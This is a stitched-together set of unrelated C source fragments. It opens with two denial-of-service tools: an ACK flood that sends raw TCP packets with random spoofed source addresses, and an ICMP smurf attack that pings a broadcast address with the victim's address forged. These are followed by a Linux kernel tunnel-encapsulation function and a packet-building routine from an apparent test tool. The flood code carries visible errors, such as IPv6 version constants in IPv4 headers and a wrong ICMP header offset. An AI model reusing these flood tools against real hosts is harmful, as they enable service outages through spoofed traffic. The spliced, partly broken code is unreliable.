// Arguments standarized and checked //
// Respects executable [[--source-addr saddr] [--[remote|broadcast]-addr raddr] [--source-port sport] [--remote-port rport] [--n N]] /Y
int main(int argc,char* argv[]){
srand(time(NULL));
if(argc!=7){fprintf(stdout,"Usage: ack-flood --remote-addr raddr --remote-port rport --n N\n"); exit(0);}
else{
/** Example source address and source port **/
char* source_address = generate_random_ip_v4(); // Randomize source_address for this flood //
char* source_port = "1338"; // Randomize port //
char* remote_address = argv[2];
char* remote_port = argv[4];
unsigned int iter = atoi(argv[6]);
/** Obtain the socket**/
int sock = get_socket_descriptor_raw_tcp();
/** Create buffer for your packets **/
char buffer[DEFAULT_PCKT_LEN]; memset(buffer,0,DEFAULT_PCKT_LEN);
/**Init sockaddr_in with my network information (Only if it's necessary, there are functions in applications that spoofs your addr)**/
struct sockaddr_in myaddr;
set_sockaddr_in(&myaddr,source_address,source_port);
/** Create your headers and make your combinations **/
IP_HEADER *ip_hdr = (IP_HEADER *)buffer;
TCP_HEADER *tcp_hdr = (TCP_HEADER *)(buffer + sizeof(IP_HEADER));
/** Fill your headers (IP && TCP in this case) **/
set_ip_header(ip_hdr,IP_VERSION_V6,IP_DEFAULT_IHL,IP_CURRENT_TOS,IP_DEFAULT_IDENTIFICATION,0,0,0,\
IP_DEFAULT_FRAGMENT_OFFSET,IP_DEFAULT_TTL,IP_TCP_PROTOCOL,0,source_address,remote_address,0);
/** Use auxiliar functions to warn of current status **/
SHOW_CREATED_IP_HEADER(ip_hdr);
set_tcp_header(tcp_hdr,source_port,remote_port,0,0,TCP_DEFAULT_OFFSET,TCP_DEFAULT_RESERVED,0,0,0,0,1,0,0,0, \
TCP_DEFAULT_WINDOW,0,0,buffer);
SHOW_CREATED_TCP_HEADER(tcp_hdr);
/** Notice the kernel that we doesn't need it fill the header **/
if(kernel_not_fill_my_header(sock)<0){fprintf(stderr,"Is not possible to notice the kernel"); exit(0);}
/** Run your application type (Syn flood in this case)**/
run_flood(sock,iter,ip_hdr,&myaddr,buffer);
}
return 0;
}
//http://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml
// Arguments standarized and checked //
// Respects executable [--source-addr saddr --[remote|broadcast]-addr raddr --source-port sport [--remote-port rport] [--n N]] //
int main(int argc,char* argv[]){
if(argc!=9){fprintf(stdout,"Usage: icmp-smurf --source-addr saddr --broadcast-addr baddr --source-port sport --n N\n"); exit(0);}
else{
/** Example source address and source port **/
char* source_address = argv[2];
char* source_port = argv[6];
char* broadcast_address = argv[4];
int iterations = atoi(argv[8]);
/** Obtain the socket**/
int sock = get_socket_descriptor_raw_tcp();
/** Create buffer for your packets **/
char buffer[DEFAULT_PCKT_LEN]; memset(buffer,0,DEFAULT_PCKT_LEN);
/**Init sockaddr_in with my network information (Only if it's necessary, there are functions in applications that spoofs your addr)**/
struct sockaddr_in myaddr;
set_sockaddr_in(&myaddr,source_address,source_port);
/** Create your headers and make your combinations **/
IP_HEADER *ip_hdr = (IP_HEADER *)buffer;
ICMP_HEADER *icmp_hdr = (ICMP_HEADER *)(buffer + sizeof(ICMP_HEADER));
/** Fill your headers (IP && TCP in this case) **/
set_ip_header(ip_hdr,IP_VERSION_V6,IP_DEFAULT_IHL,IP_CURRENT_TOS,IP_DEFAULT_IDENTIFICATION,0,0,0,\
IP_DEFAULT_FRAGMENT_OFFSET,IP_DEFAULT_TTL,IP_ICMP_PROTOCOL,0,source_address,broadcast_address,0);
/** Use auxiliar functions to warn of current status **/
SHOW_CREATED_IP_HEADER(ip_hdr);
set_icmp_header(icmp_hdr,ICMP_ECHO,0,0,0);
SHOW_CREATED_ICMP_HEADER(icmp_hdr);
/** Notice the kernel that we doesn't need it fill the header **/
if(kernel_not_fill_my_header(sock)<0){fprintf(stderr,"Is not possible to notice the kernel"); exit(0);}
/** Application (Send icmp requests to broadcast addr with victim ip spoofed) **/
int count = 0,i;
#pragma omp parallel for reduction(+:count) if(iterations>=2000000)
for(i=0;i<iterations;i++){
if(sendto(sock, buffer, ip_hdr->total_length, 0, (struct sockaddr*)&myaddr, sizeof(myaddr))>=0) count++;
}
fprintf(stdout,"Send %d icmp echo to broadcast %s\n",count,broadcast_address);
}
return 0;
}
//int encap(struct sk_buff *skb, struct tun_param *tp, unsigned int mark, struct ka_payload *kap){
int encap(struct sk_buff *skb, struct tun_param *tp, unsigned int mark, struct ka_payload *kap){
struct sk_buff *new_skb;
struct iphdr *old_iph;
//struct iphdr *iph;
struct net_device *dev;
int ret = 0;
struct sock tmpsk;
struct udphdr *udph;
u32 saddr, daddr;
u16 sport, dport;
struct rtable *rt;
struct flowi4 fl4;
unsigned int pushroom, piggyroom;
piggyroom = 0;
if(kap->tid == 0) piggyroom = 0;
else piggyroom = PIGGYROOM;
pushroom = HEADROOM + piggyroom;
old_iph = get_IP_header(skb);
daddr = tp->tr.addr;
sport = tp->tl.port;
dport = tp->tr.port;
// since 2.6.36 rtable no longer has rt_src attribute, now I get source address from the device (Sander)
dev = dev_get_by_index(upmtns->net_ns, tp->tl.ifindex);
if (!dev) {
dmesge("no device found during encap");
return -1;
}
saddr = get_dev_ip_address(dev, NULL, 0);
// since 2.6.39 ip_route_output_key flowi parameter has been replaced with flowi4, rtable no longer has rt_src attribute
// ip_route_output_key function now returns an rtable and should be replaced with ip_route_output_ports (Sander)
tmpsk.sk_mark = mark;
rt = ip_route_output_ports(dev_net(dev), &fl4, &tmpsk, daddr, 0, 0, 0, IPPROTO_IP, RT_TOS(old_iph->tos), tp->tl.ifindex);
if (!rt) {
dmesge("encap - no rtable found during encap");
ret = -1;
goto end;
}
if (skb_headroom(skb) < pushroom || skb_shared(skb) || (skb_cloned(skb) && !skb_clone_writable(skb, 0))) {
new_skb = skb_realloc_headroom(skb, pushroom);
printk(" --- socket buffer REALLOCATION\n");
if (!new_skb) {
dmesge("encap - can not realloc skb room");
ret = -1;
goto end;
}
if (skb->sk) skb_set_owner_w(new_skb, skb->sk);
dev_kfree_skb_any(skb);
skb = new_skb;
old_iph = ip_hdr(skb);
}
if(piggyroom > 0){
skb_push(skb, PIGGYROOM);
//print_ka_info(kap->info);
memcpy(skb->data, kap, sizeof(struct ka_payload));
skb_push(skb, HEADROOM);
}
else{
//printk("Creating normal packet...\n");
skb_push(skb, HEADROOM);
}
skb_reset_network_header(skb);
memset(&(IPCB(skb)->opt), 0, sizeof(IPCB(skb)->opt));
IPCB(skb)->flags &= ~(IPSKB_XFRM_TUNNEL_SIZE | IPSKB_XFRM_TRANSFORMED | IPSKB_REROUTED);
skb_dst_drop(skb);
// since 2.6.36 rtable has no 'u' attribute, you can use dst directly (Sander)
skb_dst_set(skb, &rt->dst);
set_ip_header(skb, old_iph, saddr, daddr, piggyroom);
set_udp_header(skb, old_iph, sport, dport, piggyroom);
nf_reset(skb);
// since 2.6.36 rtable has no 'u' attribute, you can use dst directly (Sander)
ip_select_ident(ip_hdr(skb), &rt->dst, NULL);
skb->mark = mark; //useless...
/*************/
udph = get_UDP_header(skb);
//dmesg("ENCAP ---> UDP src: %u dst: %u mark: %u", ntohs(udph->source), ntohs(udph->dest),skb->mark);
end:
dev_put(dev);
return ret;
}
struct packet *new_icmp_packet(int address_family,
enum direction_t direction,
const char *type_string,
const char *code_string,
int protocol,
u32 tcp_start_sequence,
u32 payload_bytes,
s64 mtu,
char **error)
{
s32 type = -1; /* bad type; means "unknown so far" */
s32 code = -1; /* bad code; means "unknown so far" */
struct packet *packet = NULL; /* the newly-allocated result packet */
/* Calculate lengths in bytes of all sections of the packet.
* For now we only support the most common ICMP message
* format, which includes at the end the original outgoing IP
* header and the first 8 bytes after that (which will
* typically have the port info needed to demux the message).
*/
const int ip_fixed_bytes = ip_header_len(address_family);
const int ip_option_bytes = 0;
const int ip_header_bytes = ip_fixed_bytes + ip_option_bytes;
const int echoed_bytes = ip_fixed_bytes + ICMP_ECHO_BYTES;
const int icmp_bytes = icmp_header_len(address_family) + echoed_bytes;
const int ip_bytes = ip_header_bytes + icmp_bytes;
/* Sanity-check all the various lengths */
if (ip_option_bytes & 0x3) {
asprintf(error, "IP options are not padded correctly "
"to ensure IP header is a multiple of 4 bytes: "
"%d excess bytes", ip_option_bytes & 0x3);
goto error_out;
}
assert((ip_header_bytes & 0x3) == 0);
/* Parse the ICMP type and code */
if (parse_icmp_type_and_code(address_family, type_string, code_string,
&type, &code, error))
goto error_out;
assert(is_valid_u8(type));
assert(is_valid_u8(code));
/* Allocate and zero out a packet object of the desired size */
packet = packet_new(ip_bytes);
memset(packet->buffer, 0, ip_bytes);
packet->ip_bytes = ip_bytes;
packet->direction = direction;
packet->flags = 0;
packet->ecn = 0;
/* Set IP header fields */
const enum ip_ecn_t ecn = ECN_NONE;
set_packet_ip_header(packet, address_family, ip_bytes, direction, ecn,
icmp_protocol(address_family));
/* Find the start of the ICMP header and then populate common fields. */
void *icmp_header = packet_start(packet) + ip_header_bytes;
if (set_packet_icmp_header(packet, icmp_header, address_family,
type, code, mtu, error))
goto error_out;
/* All ICMP message types currently supported by this tool
* include a copy of the outbound IP header and the first few
* bytes inside. To ensure that the inbound ICMP message gets
* demuxed to the correct socket in the kernel, here we
* construct enough of a basic IP header and during test
* execution we fill in the port numbers and (if specified)
* TCP sequence number in the TCP header.
*/
u8 *echoed_ip = packet_echoed_ip_header(packet);
const int echoed_ip_bytes = (ip_fixed_bytes +
layer4_header_len(protocol) +
payload_bytes);
set_ip_header(echoed_ip, address_family, echoed_ip_bytes,
reverse_direction(direction), ecn, protocol);
if (protocol == IPPROTO_TCP) {
u32 *seq = packet_echoed_tcp_seq(packet);
*seq = htonl(tcp_start_sequence);
}
return packet;
error_out:
if (packet != NULL)
packet_free(packet);
return NULL;
}
